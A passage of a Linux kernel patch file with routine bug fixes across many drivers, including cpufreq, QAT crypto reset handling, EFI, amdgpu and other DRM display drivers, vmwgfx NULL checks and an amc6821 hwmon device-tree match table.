+ #define GT_CONTROL_IRQ_ENABLE		BIT(2)	/* banked */
+ #define GT_CONTROL_AUTO_INC		BIT(3)	/* banked */
+ #define GT_CONTROL_PRESCALER_SHIFT      8
+-#define GT_CONTROL_PRESCALER_MAX        0xF
++#define GT_CONTROL_PRESCALER_MAX        0xFF
+ #define GT_CONTROL_PRESCALER_MASK       (GT_CONTROL_PRESCALER_MAX << \
+ 					 GT_CONTROL_PRESCALER_SHIFT)
+ 
+diff --git a/drivers/cpufreq/amd-pstate.c b/drivers/cpufreq/amd-pstate.c
+index edc294ee5a5bc..90dcf26f09731 100644
+--- a/drivers/cpufreq/amd-pstate.c
++++ b/drivers/cpufreq/amd-pstate.c
+@@ -320,7 +320,7 @@ static void amd_pstate_adjust_perf(unsigned int cpu,
+ 	if (target_perf < capacity)
+ 		des_perf = DIV_ROUND_UP(cap_perf * target_perf, capacity);
+ 
+-	min_perf = READ_ONCE(cpudata->highest_perf);
++	min_perf = READ_ONCE(cpudata->lowest_perf);
+ 	if (_min_perf < capacity)
+ 		min_perf = DIV_ROUND_UP(cap_perf * _min_perf, capacity);
+ 
+diff --git a/drivers/cpufreq/brcmstb-avs-cpufreq.c b/drivers/cpufreq/brcmstb-avs-cpufreq.c
+index 38ec0fedb247f..552db816ed22c 100644
+--- a/drivers/cpufreq/brcmstb-avs-cpufreq.c
++++ b/drivers/cpufreq/brcmstb-avs-cpufreq.c
+@@ -481,10 +481,11 @@ static bool brcm_avs_is_firmware_loaded(struct private_data *priv)
+ static unsigned int brcm_avs_cpufreq_get(unsigned int cpu)
+ {
+ 	struct cpufreq_policy *policy = cpufreq_cpu_get(cpu);
++	struct private_data *priv;
++
+ 	if (!policy)
+ 		return 0;
+-	struct private_data *priv = policy->driver_data;
+-
++	priv = policy->driver_data;
+ 	cpufreq_cpu_put(policy);
+ 
+ 	return brcm_avs_get_frequency(priv->base);
+diff --git a/drivers/cpufreq/cpufreq-dt.c b/drivers/cpufreq/cpufreq-dt.c
+index 4aec4b2a52259..8f8f1949d66f6 100644
+--- a/drivers/cpufreq/cpufreq-dt.c
++++ b/drivers/cpufreq/cpufreq-dt.c
+@@ -208,7 +208,7 @@ static int dt_cpufreq_early_init(struct device *dev, int cpu)
+ 	if (!priv)
+ 		return -ENOMEM;
+ 
+-	if (!alloc_cpumask_var(&priv->cpus, GFP_KERNEL))
++	if (!zalloc_cpumask_var(&priv->cpus, GFP_KERNEL))
+ 		return -ENOMEM;
+ 
+ 	cpumask_set_cpu(cpu, priv->cpus);
+diff --git a/drivers/crypto/qat/qat_common/adf_aer.c b/drivers/crypto/qat/qat_common/adf_aer.c
+index fe9bb2f3536a9..4f36b5a9164a7 100644
+--- a/drivers/crypto/qat/qat_common/adf_aer.c
++++ b/drivers/crypto/qat/qat_common/adf_aer.c
+@@ -95,18 +95,28 @@ static void adf_device_reset_worker(struct work_struct *work)
+ 	if (adf_dev_init(accel_dev) || adf_dev_start(accel_dev)) {
+ 		/* The device hanged and we can't restart it so stop here */
+ 		dev_err(&GET_DEV(accel_dev), "Restart device failed\n");
+-		kfree(reset_data);
++		if (reset_data->mode == ADF_DEV_RESET_ASYNC ||
++		    completion_done(&reset_data->compl))
++			kfree(reset_data);
+ 		WARN(1, "QAT: device restart failed. Device is unusable\n");
+ 		return;
+ 	}
+ 	adf_dev_restarted_notify(accel_dev);
+ 	clear_bit(ADF_STATUS_RESTARTING, &accel_dev->status);
+ 
+-	/* The dev is back alive. Notify the caller if in sync mode */
+-	if (reset_data->mode == ADF_DEV_RESET_SYNC)
+-		complete(&reset_data->compl);
+-	else
++	/*
++	 * The dev is back alive. Notify the caller if in sync mode
++	 *
++	 * If device restart will take a more time than expected,
++	 * the schedule_reset() function can timeout and exit. This can be
++	 * detected by calling the completion_done() function. In this case
++	 * the reset_data structure needs to be freed here.
++	 */
++	if (reset_data->mode == ADF_DEV_RESET_ASYNC ||
++	    completion_done(&reset_data->compl))
+ 		kfree(reset_data);
++	else
++		complete(&reset_data->compl);
+ }
+ 
+ static int adf_dev_aer_schedule_reset(struct adf_accel_dev *accel_dev,
+@@ -139,8 +149,9 @@ static int adf_dev_aer_schedule_reset(struct adf_accel_dev *accel_dev,
+ 			dev_err(&GET_DEV(accel_dev),
+ 				"Reset device timeout expired\n");
+ 			ret = -EFAULT;
++		} else {
++			kfree(reset_data);
+ 		}
+-		kfree(reset_data);
+ 		return ret;
+ 	}
+ 	return 0;
+diff --git a/drivers/firmware/efi/efi.c b/drivers/firmware/efi/efi.c
+index 9077353d1c98d..28d4defc5d0cd 100644
+--- a/drivers/firmware/efi/efi.c
++++ b/drivers/firmware/efi/efi.c
+@@ -194,6 +194,8 @@ static bool generic_ops_supported(void)
+ 
+ 	name_size = sizeof(name);
+ 
++	if (!efi.get_next_variable)
++		return false;
+ 	status = efi.get_next_variable(&name_size, &name, &guid);
+ 	if (status == EFI_UNSUPPORTED)
+ 		return false;
+diff --git a/drivers/firmware/efi/libstub/randomalloc.c b/drivers/firmware/efi/libstub/randomalloc.c
+index 7ba05719a53ba..fff826f56728c 100644
+--- a/drivers/firmware/efi/libstub/randomalloc.c
++++ b/drivers/firmware/efi/libstub/randomalloc.c
+@@ -119,7 +119,7 @@ efi_status_t efi_random_alloc(unsigned long size,
+ 			continue;
+ 		}
+ 
+-		target = round_up(md->phys_addr, align) + target_slot * align;
++		target = round_up(max_t(u64, md->phys_addr, alloc_min), align) + target_slot * align;
+ 		pages = size / EFI_PAGE_SIZE;
+ 
+ 		status = efi_bs_call(allocate_pages, EFI_ALLOCATE_ADDRESS,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
+index 158b791883f03..dfb9d42007730 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
+@@ -838,6 +838,7 @@ static void amdgpu_ttm_gart_bind(struct amdgpu_device *adev,
+ 		amdgpu_gart_bind(adev, gtt->offset, ttm->num_pages,
+ 				 gtt->ttm.dma_address, flags);
+ 	}
++	gtt->bound = true;
+ }
+ 
+ /*
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_priv.h b/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
+index ec8a576ac5a9e..3c7d267f2a07b 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
+@@ -1349,7 +1349,7 @@ void kfd_flush_tlb(struct kfd_process_device *pdd, enum TLB_FLUSH_TYPE type);
+ 
+ static inline bool kfd_flush_tlb_after_unmap(struct kfd_dev *dev)
+ {
+-	return KFD_GC_VERSION(dev) > IP_VERSION(9, 4, 2) ||
++	return KFD_GC_VERSION(dev) >= IP_VERSION(9, 4, 2) ||
+ 	       (KFD_GC_VERSION(dev) == IP_VERSION(9, 4, 1) && dev->sdma_fw_version >= 18) ||
+ 	       KFD_GC_VERSION(dev) == IP_VERSION(9, 4, 0);
+ }
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index a6c6f286a5988..ff460c9802eb2 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -10503,14 +10503,23 @@ void amdgpu_dm_update_freesync_caps(struct drm_connector *connector,
+ 				if (range->flags != 1)
+ 					continue;
+ 
+-				amdgpu_dm_connector->min_vfreq = range->min_vfreq;
+-				amdgpu_dm_connector->max_vfreq = range->max_vfreq;
+-				amdgpu_dm_connector->pixel_clock_mhz =
+-					range->pixel_clock_mhz * 10;
+-
+ 				connector->display_info.monitor_range.min_vfreq = range->min_vfreq;
+ 				connector->display_info.monitor_range.max_vfreq = range->max_vfreq;
+ 
++				if (edid->revision >= 4) {
++					if (data->pad2 & DRM_EDID_RANGE_OFFSET_MIN_VFREQ)
++						connector->display_info.monitor_range.min_vfreq += 255;
++					if (data->pad2 & DRM_EDID_RANGE_OFFSET_MAX_VFREQ)
++						connector->display_info.monitor_range.max_vfreq += 255;
++				}
++
++				amdgpu_dm_connector->min_vfreq =
++					connector->display_info.monitor_range.min_vfreq;
++				amdgpu_dm_connector->max_vfreq =
++					connector->display_info.monitor_range.max_vfreq;
++				amdgpu_dm_connector->pixel_clock_mhz =
++					range->pixel_clock_mhz * 10;
++
+ 				break;
+ 			}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+index 72bec33e371f3..0225b2c96041d 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+@@ -651,10 +651,20 @@ void dcn30_set_avmute(struct pipe_ctx *pipe_ctx, bool enable)
+ 	if (pipe_ctx == NULL)
+ 		return;
+ 
+-	if (dc_is_hdmi_signal(pipe_ctx->stream->signal) && pipe_ctx->stream_res.stream_enc != NULL)
++	if (dc_is_hdmi_signal(pipe_ctx->stream->signal) && pipe_ctx->stream_res.stream_enc != NULL) {
+ 		pipe_ctx->stream_res.stream_enc->funcs->set_avmute(
+ 				pipe_ctx->stream_res.stream_enc,
+ 				enable);
++
++		/* Wait for two frame to make sure AV mute is sent out */
++		if (enable) {
++			pipe_ctx->stream_res.tg->funcs->wait_for_state(pipe_ctx->stream_res.tg, CRTC_STATE_VACTIVE);
++			pipe_ctx->stream_res.tg->funcs->wait_for_state(pipe_ctx->stream_res.tg, CRTC_STATE_VBLANK);
++			pipe_ctx->stream_res.tg->funcs->wait_for_state(pipe_ctx->stream_res.tg, CRTC_STATE_VACTIVE);
++			pipe_ctx->stream_res.tg->funcs->wait_for_state(pipe_ctx->stream_res.tg, CRTC_STATE_VBLANK);
++			pipe_ctx->stream_res.tg->funcs->wait_for_state(pipe_ctx->stream_res.tg, CRTC_STATE_VACTIVE);
++		}
++	}
+ }
+ 
+ void dcn30_update_info_frame(struct pipe_ctx *pipe_ctx)
+diff --git a/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_psp.c b/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_psp.c
+index ee67a35c2a8ed..ff930a71e496a 100644
+--- a/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_psp.c
++++ b/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_psp.c
+@@ -513,6 +513,9 @@ enum mod_hdcp_status mod_hdcp_hdcp2_create_session(struct mod_hdcp *hdcp)
+ 	hdcp_cmd = (struct ta_hdcp_shared_memory *)psp->hdcp_context.context.mem_context.shared_buf;
+ 	memset(hdcp_cmd, 0, sizeof(struct ta_hdcp_shared_memory));
+ 
++	if (!display)
++		return MOD_HDCP_STATUS_DISPLAY_NOT_FOUND;
++
+ 	hdcp_cmd->in_msg.hdcp2_create_session_v2.display_handle = display->index;
+ 
+ 	if (hdcp->connection.link.adjust.hdcp2.force_type == MOD_HDCP_FORCE_TYPE_0)
+diff --git a/drivers/gpu/drm/amd/pm/amdgpu_pm.c b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+index 29f3d8431089e..cdb406690b7e7 100644
+--- a/drivers/gpu/drm/amd/pm/amdgpu_pm.c
++++ b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+@@ -2344,6 +2344,7 @@ static ssize_t amdgpu_hwmon_set_pwm1_enable(struct device *dev,
+ {
+ 	struct amdgpu_device *adev = dev_get_drvdata(dev);
+ 	int err, ret;
++	u32 pwm_mode;
+ 	int value;
+ 
+ 	if (amdgpu_in_reset(adev))
+@@ -2355,13 +2356,22 @@ static ssize_t amdgpu_hwmon_set_pwm1_enable(struct device *dev,
+ 	if (err)
+ 		return err;
+ 
++	if (value == 0)
++		pwm_mode = AMD_FAN_CTRL_NONE;
++	else if (value == 1)
++		pwm_mode = AMD_FAN_CTRL_MANUAL;
++	else if (value == 2)
++		pwm_mode = AMD_FAN_CTRL_AUTO;
++	else
++		return -EINVAL;
++
+ 	ret = pm_runtime_get_sync(adev_to_drm(adev)->dev);
+ 	if (ret < 0) {
+ 		pm_runtime_put_autosuspend(adev_to_drm(adev)->dev);
+ 		return ret;
+ 	}
+ 
+-	ret = amdgpu_dpm_set_fan_control_mode(adev, value);
++	ret = amdgpu_dpm_set_fan_control_mode(adev, pwm_mode);
+ 
+ 	pm_runtime_mark_last_busy(adev_to_drm(adev)->dev);
+ 	pm_runtime_put_autosuspend(adev_to_drm(adev)->dev);
+diff --git a/drivers/gpu/drm/drm_panel.c b/drivers/gpu/drm/drm_panel.c
+index f634371c717a8..7fd3de89ed079 100644
+--- a/drivers/gpu/drm/drm_panel.c
++++ b/drivers/gpu/drm/drm_panel.c
+@@ -207,19 +207,24 @@ EXPORT_SYMBOL(drm_panel_disable);
+  * The modes probed from the panel are automatically added to the connector
+  * that the panel is attached to.
+  *
+- * Return: The number of modes available from the panel on success or a
+- * negative error code on failure.
++ * Return: The number of modes available from the panel on success, or 0 on
++ * failure (no modes).
+  */
+ int drm_panel_get_modes(struct drm_panel *panel,
+ 			struct drm_connector *connector)
+ {
+ 	if (!panel)
+-		return -EINVAL;
++		return 0;
+ 
+-	if (panel->funcs && panel->funcs->get_modes)
+-		return panel->funcs->get_modes(panel, connector);
++	if (panel->funcs && panel->funcs->get_modes) {
++		int num;
+ 
+-	return -EOPNOTSUPP;
++		num = panel->funcs->get_modes(panel, connector);
++		if (num > 0)
++			return num;
++	}
++
++	return 0;
+ }
+ EXPORT_SYMBOL(drm_panel_get_modes);
+ 
+diff --git a/drivers/gpu/drm/drm_probe_helper.c b/drivers/gpu/drm/drm_probe_helper.c
+index 3b968ad187cf3..52dbaf74fe164 100644
+--- a/drivers/gpu/drm/drm_probe_helper.c
++++ b/drivers/gpu/drm/drm_probe_helper.c
+@@ -362,6 +362,13 @@ static int drm_helper_probe_get_modes(struct drm_connector *connector)
+ 
+ 	count = connector_funcs->get_modes(connector);
+ 
++	/* The .get_modes() callback should not return negative values. */
++	if (count < 0) {
++		drm_err(connector->dev, ".get_modes() returned %pe\n",
++			ERR_PTR(count));
++		count = 0;
++	}
++
+ 	/*
+ 	 * Fallback for when DDC probe failed in drm_get_edid() and thus skipped
+ 	 * override/firmware EDID.
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_drv.c b/drivers/gpu/drm/etnaviv/etnaviv_drv.c
+index 1d2b4fb4bcf8b..f29952a55c05d 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_drv.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_drv.c
+@@ -488,7 +488,7 @@ static const struct drm_driver etnaviv_drm_driver = {
+ 	.desc               = "etnaviv DRM",
+ 	.date               = "20151214",
+ 	.major              = 1,
+-	.minor              = 3,
++	.minor              = 4,
+ };
+ 
+ /*
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_hwdb.c b/drivers/gpu/drm/etnaviv/etnaviv_hwdb.c
+index f2fc645c79569..212e7050c4ba6 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_hwdb.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_hwdb.c
+@@ -135,6 +135,9 @@ static const struct etnaviv_chip_identity etnaviv_chip_identities[] = {
+ bool etnaviv_fill_identity_from_hwdb(struct etnaviv_gpu *gpu)
+ {
+ 	struct etnaviv_chip_identity *ident = &gpu->identity;
++	const u32 product_id = ident->product_id;
++	const u32 customer_id = ident->customer_id;
++	const u32 eco_id = ident->eco_id;
+ 	int i;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(etnaviv_chip_identities); i++) {
+@@ -148,6 +151,12 @@ bool etnaviv_fill_identity_from_hwdb(struct etnaviv_gpu *gpu)
+ 			 etnaviv_chip_identities[i].eco_id == ~0U)) {
+ 			memcpy(ident, &etnaviv_chip_identities[i],
+ 			       sizeof(*ident));
++
++			/* Restore some id values as ~0U aka 'don't care' might been used. */
++			ident->product_id = product_id;
++			ident->customer_id = customer_id;
++			ident->eco_id = eco_id;
++
+ 			return true;
+ 		}
+ 	}
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_vidi.c b/drivers/gpu/drm/exynos/exynos_drm_vidi.c
+index f5e1adfcaa514..fb941a8c99f0f 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_vidi.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_vidi.c
+@@ -316,14 +316,14 @@ static int vidi_get_modes(struct drm_connector *connector)
+ 	 */
+ 	if (!ctx->raw_edid) {
+ 		DRM_DEV_DEBUG_KMS(ctx->dev, "raw_edid is null.\n");
+-		return -EFAULT;
++		return 0;
+ 	}
+ 
+ 	edid_len = (1 + ctx->raw_edid->extensions) * EDID_LENGTH;
+ 	edid = kmemdup(ctx->raw_edid, edid_len, GFP_KERNEL);
+ 	if (!edid) {
+ 		DRM_DEV_DEBUG_KMS(ctx->dev, "failed to allocate edid\n");
+-		return -ENOMEM;
++		return 0;
+ 	}
+ 
+ 	drm_connector_update_edid_property(connector, edid);
+diff --git a/drivers/gpu/drm/exynos/exynos_hdmi.c b/drivers/gpu/drm/exynos/exynos_hdmi.c
+index 1a7194a653ae5..be2d9cbaaef2e 100644
+--- a/drivers/gpu/drm/exynos/exynos_hdmi.c
++++ b/drivers/gpu/drm/exynos/exynos_hdmi.c
+@@ -887,11 +887,11 @@ static int hdmi_get_modes(struct drm_connector *connector)
+ 	int ret;
+ 
+ 	if (!hdata->ddc_adpt)
+-		return -ENODEV;
++		return 0;
+ 
+ 	edid = drm_get_edid(connector, hdata->ddc_adpt);
+ 	if (!edid)
+-		return -ENODEV;
++		return 0;
+ 
+ 	hdata->dvi_mode = !connector->display_info.is_hdmi;
+ 	DRM_DEV_DEBUG_KMS(hdata->dev, "%s : width[%d] x height[%d]\n",
+diff --git a/drivers/gpu/drm/i915/display/intel_bios.c b/drivers/gpu/drm/i915/display/intel_bios.c
+index a70b7061742a8..9cc1ef2ca72cc 100644
+--- a/drivers/gpu/drm/i915/display/intel_bios.c
++++ b/drivers/gpu/drm/i915/display/intel_bios.c
+@@ -3413,6 +3413,9 @@ static bool intel_bios_encoder_supports_dp_dual_mode(const struct intel_bios_enc
+ {
+ 	const struct child_device_config *child = &devdata->child;
+ 
++	if (!devdata)
++		return false;
++
+ 	if (!intel_bios_encoder_supports_dp(devdata) ||
+ 	    !intel_bios_encoder_supports_hdmi(devdata))
+ 		return false;
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_userptr.c b/drivers/gpu/drm/i915/gem/i915_gem_userptr.c
+index ba14b18d65f38..2e7c52c2e47dd 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_userptr.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_userptr.c
+@@ -378,6 +378,9 @@ i915_gem_userptr_release(struct drm_i915_gem_object *obj)
+ {
+ 	GEM_WARN_ON(obj->userptr.page_ref);
+ 
++	if (!obj->userptr.notifier.mm)
++		return;
++
+ 	mmu_interval_notifier_remove(&obj->userptr.notifier);
+ 	obj->userptr.notifier.mm = NULL;
+ }
+diff --git a/drivers/gpu/drm/i915/gt/intel_engine_pm.c b/drivers/gpu/drm/i915/gt/intel_engine_pm.c
+index b0a4a2dbe3ee9..feb0fc32a19ae 100644
+--- a/drivers/gpu/drm/i915/gt/intel_engine_pm.c
++++ b/drivers/gpu/drm/i915/gt/intel_engine_pm.c
+@@ -253,9 +253,6 @@ static int __engine_park(struct intel_wakeref *wf)
+ 	intel_engine_park_heartbeat(engine);
+ 	intel_breadcrumbs_park(engine->breadcrumbs);
+ 
+-	/* Must be reset upon idling, or we may miss the busy wakeup. */
+-	GEM_BUG_ON(engine->sched_engine->queue_priority_hint != INT_MIN);
+-
+ 	if (engine->park)
+ 		engine->park(engine);
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+index f903ee1ce06e7..eae138b9f2df3 100644
+--- a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
++++ b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+@@ -3270,6 +3270,9 @@ static void execlists_park(struct intel_engine_cs *engine)
+ {
+ 	cancel_timer(&engine->execlists.timer);
+ 	cancel_timer(&engine->execlists.preempt);
++
++	/* Reset upon idling, or we may delay the busy wakeup. */
++	WRITE_ONCE(engine->sched_engine->queue_priority_hint, INT_MIN);
+ }
+ 
+ static void add_to_engine(struct i915_request *rq)
+diff --git a/drivers/gpu/drm/imx/parallel-display.c b/drivers/gpu/drm/imx/parallel-display.c
+index 06723b2e9b847..64b6bc2de873e 100644
+--- a/drivers/gpu/drm/imx/parallel-display.c
++++ b/drivers/gpu/drm/imx/parallel-display.c
+@@ -72,14 +72,14 @@ static int imx_pd_connector_get_modes(struct drm_connector *connector)
+ 		int ret;
+ 
+ 		if (!mode)
+-			return -EINVAL;
++			return 0;
+ 
+ 		ret = of_get_drm_display_mode(np, &imxpd->mode,
+ 					      &imxpd->bus_flags,
+ 					      OF_USE_NATIVE_MODE);
+ 		if (ret) {
+ 			drm_mode_destroy(connector->dev, mode);
+-			return ret;
++			return 0;
+ 		}
+ 
+ 		drm_mode_copy(mode, &imxpd->mode);
+diff --git a/drivers/gpu/drm/nouveau/nouveau_dmem.c b/drivers/gpu/drm/nouveau/nouveau_dmem.c
+index 20fe53815b20f..6ca4a46a82ee9 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_dmem.c
++++ b/drivers/gpu/drm/nouveau/nouveau_dmem.c
+@@ -379,9 +379,9 @@ nouveau_dmem_evict_chunk(struct nouveau_dmem_chunk *chunk)
+ 	dma_addr_t *dma_addrs;
+ 	struct nouveau_fence *fence;
+ 
+-	src_pfns = kcalloc(npages, sizeof(*src_pfns), GFP_KERNEL);
+-	dst_pfns = kcalloc(npages, sizeof(*dst_pfns), GFP_KERNEL);
+-	dma_addrs = kcalloc(npages, sizeof(*dma_addrs), GFP_KERNEL);
++	src_pfns = kvcalloc(npages, sizeof(*src_pfns), GFP_KERNEL | __GFP_NOFAIL);
++	dst_pfns = kvcalloc(npages, sizeof(*dst_pfns), GFP_KERNEL | __GFP_NOFAIL);
++	dma_addrs = kvcalloc(npages, sizeof(*dma_addrs), GFP_KERNEL | __GFP_NOFAIL);
+ 
+ 	migrate_device_range(src_pfns, chunk->pagemap.range.start >> PAGE_SHIFT,
+ 			npages);
+@@ -407,11 +407,11 @@ nouveau_dmem_evict_chunk(struct nouveau_dmem_chunk *chunk)
+ 	migrate_device_pages(src_pfns, dst_pfns, npages);
+ 	nouveau_dmem_fence_done(&fence);
+ 	migrate_device_finalize(src_pfns, dst_pfns, npages);
+-	kfree(src_pfns);
+-	kfree(dst_pfns);
++	kvfree(src_pfns);
++	kvfree(dst_pfns);
+ 	for (i = 0; i < npages; i++)
+ 		dma_unmap_page(chunk->drm->dev->dev, dma_addrs[i], PAGE_SIZE, DMA_BIDIRECTIONAL);
+-	kfree(dma_addrs);
++	kvfree(dma_addrs);
+ }
+ 
+ void
+diff --git a/drivers/gpu/drm/vc4/vc4_hdmi.c b/drivers/gpu/drm/vc4/vc4_hdmi.c
+index ea2eaf6032caa..f696818913499 100644
+--- a/drivers/gpu/drm/vc4/vc4_hdmi.c
++++ b/drivers/gpu/drm/vc4/vc4_hdmi.c
+@@ -497,7 +497,7 @@ static int vc4_hdmi_connector_get_modes(struct drm_connector *connector)
+ 	edid = drm_get_edid(connector, vc4_hdmi->ddc);
+ 	cec_s_phys_addr_from_edid(vc4_hdmi->cec_adap, edid);
+ 	if (!edid)
+-		return -ENODEV;
++		return 0;
+ 
+ 	drm_connector_update_edid_property(connector, edid);
+ 	ret = drm_add_edid_modes(connector, edid);
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
+index b909a3ce9af3c..9d7a1b710f48f 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
+@@ -1429,12 +1429,15 @@ static void vmw_debugfs_resource_managers_init(struct vmw_private *vmw)
+ 					    root, "system_ttm");
+ 	ttm_resource_manager_create_debugfs(ttm_manager_type(&vmw->bdev, TTM_PL_VRAM),
+ 					    root, "vram_ttm");
+-	ttm_resource_manager_create_debugfs(ttm_manager_type(&vmw->bdev, VMW_PL_GMR),
+-					    root, "gmr_ttm");
+-	ttm_resource_manager_create_debugfs(ttm_manager_type(&vmw->bdev, VMW_PL_MOB),
+-					    root, "mob_ttm");
+-	ttm_resource_manager_create_debugfs(ttm_manager_type(&vmw->bdev, VMW_PL_SYSTEM),
+-					    root, "system_mob_ttm");
++	if (vmw->has_gmr)
++		ttm_resource_manager_create_debugfs(ttm_manager_type(&vmw->bdev, VMW_PL_GMR),
++						    root, "gmr_ttm");
++	if (vmw->has_mob) {
++		ttm_resource_manager_create_debugfs(ttm_manager_type(&vmw->bdev, VMW_PL_MOB),
++						    root, "mob_ttm");
++		ttm_resource_manager_create_debugfs(ttm_manager_type(&vmw->bdev, VMW_PL_SYSTEM),
++						    root, "system_mob_ttm");
++	}
+ }
+ 
+ static int vmwgfx_pm_notifier(struct notifier_block *nb, unsigned long val,
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+index bc7f02e4ecebb..2f7ac91149fc0 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+@@ -447,7 +447,7 @@ static int vmw_resource_context_res_add(struct vmw_private *dev_priv,
+ 	    vmw_res_type(ctx) == vmw_res_dx_context) {
+ 		for (i = 0; i < cotable_max; ++i) {
+ 			res = vmw_context_cotable(ctx, i);
+-			if (IS_ERR(res))
++			if (IS_ERR_OR_NULL(res))
+ 				continue;
+ 
+ 			ret = vmw_execbuf_res_val_add(sw_context, res,
+@@ -1259,6 +1259,8 @@ static int vmw_cmd_dx_define_query(struct vmw_private *dev_priv,
+ 		return -EINVAL;
+ 
+ 	cotable_res = vmw_context_cotable(ctx_node->ctx, SVGA_COTABLE_DXQUERY);
++	if (IS_ERR_OR_NULL(cotable_res))
++		return cotable_res ? PTR_ERR(cotable_res) : -EINVAL;
+ 	ret = vmw_cotable_notify(cotable_res, cmd->body.queryId);
+ 
+ 	return ret;
+@@ -2477,6 +2479,8 @@ static int vmw_cmd_dx_view_define(struct vmw_private *dev_priv,
+ 		return ret;
+ 
+ 	res = vmw_context_cotable(ctx_node->ctx, vmw_view_cotables[view_type]);
++	if (IS_ERR_OR_NULL(res))
++		return res ? PTR_ERR(res) : -EINVAL;
+ 	ret = vmw_cotable_notify(res, cmd->defined_id);
+ 	if (unlikely(ret != 0))
+ 		return ret;
+@@ -2562,8 +2566,8 @@ static int vmw_cmd_dx_so_define(struct vmw_private *dev_priv,
+ 
+ 	so_type = vmw_so_cmd_to_type(header->id);
+ 	res = vmw_context_cotable(ctx_node->ctx, vmw_so_cotables[so_type]);
+-	if (IS_ERR(res))
+-		return PTR_ERR(res);
++	if (IS_ERR_OR_NULL(res))
++		return res ? PTR_ERR(res) : -EINVAL;
+ 	cmd = container_of(header, typeof(*cmd), header);
+ 	ret = vmw_cotable_notify(res, cmd->defined_id);
+ 
+@@ -2682,6 +2686,8 @@ static int vmw_cmd_dx_define_shader(struct vmw_private *dev_priv,
+ 		return -EINVAL;
+ 
+ 	res = vmw_context_cotable(ctx_node->ctx, SVGA_COTABLE_DXSHADER);
++	if (IS_ERR_OR_NULL(res))
++		return res ? PTR_ERR(res) : -EINVAL;
+ 	ret = vmw_cotable_notify(res, cmd->body.shaderId);
+ 	if (ret)
+ 		return ret;
+@@ -3003,6 +3009,8 @@ static int vmw_cmd_dx_define_streamoutput(struct vmw_private *dev_priv,
+ 	}
+ 
+ 	res = vmw_context_cotable(ctx_node->ctx, SVGA_COTABLE_STREAMOUTPUT);
++	if (IS_ERR_OR_NULL(res))
++		return res ? PTR_ERR(res) : -EINVAL;
+ 	ret = vmw_cotable_notify(res, cmd->body.soid);
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/hwmon/amc6821.c b/drivers/hwmon/amc6821.c
+index 3bfd12ff4b3ca..6868db4ac84f3 100644
+--- a/drivers/hwmon/amc6821.c
++++ b/drivers/hwmon/amc6821.c
+@@ -934,10 +934,21 @@ static const struct i2c_device_id amc6821_id[] = {
+ 
+ MODULE_DEVICE_TABLE(i2c, amc6821_id);
+ 
++static const struct of_device_id __maybe_unused amc6821_of_match[] = {
++	{
++		.compatible = "ti,amc6821",
++		.data = (void *)amc6821,
++	},
++	{ }
++};
++
++MODULE_DEVICE_TABLE(of, amc6821_of_match);
++
+ static struct i2c_driver amc6821_driver = {
+ 	.class = I2C_CLASS_HWMON,
+ 	.driver = {
+ 		.name	= "amc6821",
++		.of_match_table = of_match_ptr(amc6821_of_match),
+ 	},
+ 	.probe_new = amc6821_probe,
+ 	.id_table = amc6821_id,
+diff --git a/drivers/i2c/busses/i2c-i801.c b/drivers/i2c/busses/i2c-i801.c
+index 9a4e9bf304c28..1c970842624ba 100644
+--- a/drivers/i2c/busses/i2c-i801.c
++++ b/drivers/i2c/busses/i2c-i801.c
+@@ -1422,7 +1422,6 @@ static void i801_add_mux(struct i801_priv *priv)
+ 		lookup->table[i] = GPIO_LOOKUP(mux_config->gpio_chip,
+ 					       mux_config->gpios[i], "mux", 0);
